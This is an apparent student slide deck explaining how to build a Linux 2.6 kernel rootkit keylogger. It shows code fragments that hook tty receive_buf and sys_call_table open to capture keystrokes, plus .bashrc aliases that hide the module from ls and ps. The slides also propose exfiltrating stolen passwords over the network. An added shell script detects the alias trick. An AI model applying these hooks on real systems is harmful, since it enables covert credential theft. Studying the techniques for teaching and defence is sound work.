Linux Kernel Rootkit : Virtual Terminal Key Logger
Slide 1: Linux Kernel Rootkit : Virtual Terminal Key Logger
Jeena Kleenankandy, Roll No. P140066CS
Department of Computer Science and Engineering, National Institute of Technology Calicut
jeena_p140066cs@nitc.ac.in
April 24, 2015
Jeena Kleenankandy Roll No. P140066CS (NITC) Linux Rootkit April 24, / 17
Slide 2: Overview
1 Objective/Motivation
2 Introduction
3 Terminology
4 Linux TTY Devices
5 Kernel data structures
6 Maintaining Stealth
7 Conclusion & Future Work
8 References
Slide 3: Objective / Motivation
To gain insight into the internal working of the kernel, especially TTY drivers and system calls
To understand the vulnerabilities in the kernel by taking the role of an attacker
To develop a rootkit, a terminal key-logger, that targets the Linux 2.6 kernel
Slide 4: Introduction: Linux Kernel Rootkit
1 Attack the tty structure of the Linux kernel to capture user inputs, from both local and remote logins
2 Modify the system call table's access privilege to hook system calls
3 Print the captured inputs into the system log
4 Modify the ps and ls commands to hide the presence of the rootkit
Slide 5: Some terms & commands you already know: Rootkit
Rootkit: A collection of tools that allows a hacker to provide a backdoor into a system, collect information on other systems on the network, mask the fact that the system is compromised, and much more. Rootkits are typically used to capture passwords, though they can be used to collect any privileged information.
Slide 6: Some terms & commands you already know: Loadable Kernel Module
LKM: An object file that contains code to extend the running kernel of an operating system. Modules are dynamically linked to the kernel and are as powerful as the kernel itself.
insmod: Insert an LKM into the kernel.
rmmod: Remove an LKM from the kernel.
Slide 7: Some terms & commands you already know: System Call Hooks
Hooks work by modifying function pointers to point to a malicious version of a function, by which the attacker can gain complete control of the execution flow of a particular call.
Slide 8: Linux TTY Devices
Slide 9: Kernel data structures: struct tty_struct
An instance of tty_struct is created any time a new tty device is opened, and exists until it is last closed.

    /* /usr/include/linux/tty.h (abridged) */
    struct tty_struct {
        int magic;
        struct tty_driver *driver;     /* the driver that owns this tty */
        struct tty_ldisc *ldisc;       /* current line discipline */
        struct termios *termios, *termios_locked;
        ...
    };
Slide 10: Kernel data structures: struct tty_ldisc
The structure is referenced by the ldisc field of tty_struct.

    struct tty_ldisc {
        struct tty_ldisc_ops *ops;
        struct tty_struct *tty;
    };

    struct tty_ldisc_ops {
        ...
        /* called by the low-level tty driver with freshly received characters */
        void (*receive_buf)(struct tty_struct *, const unsigned char *cp,
                            char *fp, int count);
        ...
    };

receive_buf() is called by the low-level tty driver to send characters received by the hardware to the line discipline for processing.
Slide 11: Kernel data structures: To log inputs on tty0

    int fd = open("/dev/tty0", O_RDONLY, 0);
    struct file *file = fget(fd);
    struct tty_struct *tty = file->private_data;   /* the tty behind the file */
    old_receive_buf = tty->ldisc->ops->receive_buf;  /* save the original */
    tty->ldisc->ops->receive_buf = new_receive_buf;  /* install the hook */

tty_struct and tty queue structures are dynamically allocated only when the tty is open. We have to intercept the sys_open syscall to dynamically hook the receive_buf() function of each tty or pty when it is invoked.
Slide 12: Kernel data structures: Our malicious new function

    void new_receive_buf(struct tty_struct *tty, const unsigned char *cp,
                         char *fp, int count)
    {
        /* log inputs here ... */

        /* call the original receive_buf */
        (*old_receive_buf)(tty, cp, fp, count);
    }

cp is a pointer to the buffer of input characters received by the device. fp is a pointer to a pointer of flag bytes which indicate whether a character was received with a parity error, etc.
Slide 13: Kernel data structures: To intercept the open syscall

    original_sys_open = sys_call_table[__NR_open];
    sys_call_table[__NR_open] = new_sys_open;

Oops! The sys_call_table symbol is no longer exported in kernel 2.6. To solve this, get the location of the syscall table from the /boot/System.map file:

    grep sys_call_table /boot/System.map
    sys_call_table = (void *)0xc /* remaining digits as printed by grep */;
Slide 14: Maintaining Stealth
To hide the rootkit, create aliases in the .bashrc file:
For the ls command:
    alias ls='ls --ignore=klog'
For the ps command:
    alias ps='ps > /tmp/temp.txt; cat /tmp/temp.txt | grep -v klog'
Not a brilliant idea, but enough to fool a naive user.
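The alias trick above leaves its fingerprint in plain text in the user's rc files, which is where a defender looks first. The following POSIX shell script is an added example, not part of the slides: it scans an rc file for ls/ps-style aliases whose replacement filters its own output, and the sample .bashrc it builds is constructed to mirror the slide's two aliases.

```shell
#!/bin/sh
# Added example (not from the slides): detect the .bashrc alias stealth trick.
# A rootkit hidden by aliasing ls/ps to filtered versions leaves the alias
# text in the user's rc files, which can be checked directly.

# Build a constructed sample rc file that mirrors the slide's two aliases
# plus some benign lines. Prints the temp file's path.
make_sample_rc() {
  f=$(mktemp)
  cat > "$f" <<'EOF'
# constructed sample ~/.bashrc
alias ll='ls -l'
alias ls='ls --ignore=klog'
alias ps='ps > /tmp/temp.txt; cat /tmp/temp.txt | grep -v klog'
export PATH="$PATH:/usr/local/bin"
EOF
  printf '%s\n' "$f"
}

# Print each line of FILE that aliases a listing command (ls, ps, lsmod,
# netstat) to something that filters its output (grep -v, --ignore, --hide,
# sed). Returns 0 when the file looks clean, 1 when anything was reported.
scan_rc_file() {
  file=$1
  count=0
  while IFS= read -r line || [ -n "$line" ]; do
    case "$line" in
      *'alias ls='*|*'alias ps='*|*'alias lsmod='*|*'alias netstat='*)
        case "$line" in
          *'grep -v'*|*'--ignore'*|*'--hide'*|*'sed '*)
            printf 'SUSPICIOUS (%s): %s\n' "$file" "$line"
            count=$((count + 1)) ;;
        esac ;;
    esac
  done < "$file"
  [ "$count" -eq 0 ]
}

# Number of suspicious alias lines in FILE, for use in scripts.
count_suspicious() {
  scan_rc_file "$1" | grep -c '^SUSPICIOUS' || true
}

# Scan the rc files a login shell actually reads, both per-user and global.
# Returns 1 if any of them contains a filtering alias.
scan_login_rc_files() {
  status=0
  for rc in "$HOME/.bashrc" "$HOME/.bash_profile" "$HOME/.profile" \
            /etc/bash.bashrc /etc/profile; do
    [ -r "$rc" ] || continue
    scan_rc_file "$rc" || status=1
  done
  return "$status"
}

# Stand-alone run: scan the constructed sample, then the real rc files.
if [ "${1:-}" = "--demo" ]; then
  sample=$(make_sample_rc)
  scan_rc_file "$sample" || echo "sample: filtering aliases found"
  rm -f "$sample"
  scan_login_rc_files && echo "login rc files: no filtering aliases found"
fi
```

Run it with `--demo` to see both aliases from the sample flagged; a clean machine reports nothing for the real rc files, and a hit is worth comparing against the unaliased binary (`command ls`, `/bin/ps`).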
Slide 15: Conclusion & Future Work
1 Demonstrates that anyone with a basic knowledge of Linux and C programming can create simple rootkits.
2 Should have written to a separate file instead of using printk.
3 Enhance it to listen for a signal from the attacker and send the hijacked password over the network.
4 Could be made to hide itself from the lsmod command.
Slide 16: References
Raúl Siles Peláez (2004). Linux kernel rootkits: protecting the system's Ring-Zero. GIAC Unix Security Administrator (GCUX).
Dr. Subrata Acharya, Brian Namovicz, Jonathan Wiseman (2010). A Hybrid Root-kit for Linux Operating System. Colonial Academic Alliance Research Journal, 1, pp.
Linux Cross Reference, Free Electrons. Accessed on 28 March 2015.
Writing Linux Kernel Keylogger. Phrack Magazine, Volume 0x0b, Issue 0x3b, Phile 0x0e of 0x12, June 19th, 2002.
Slide 17: WORD OF CAUTION
Don't ever try this on a real OS; VirtualBoxes are cheaper to crash.
Thank You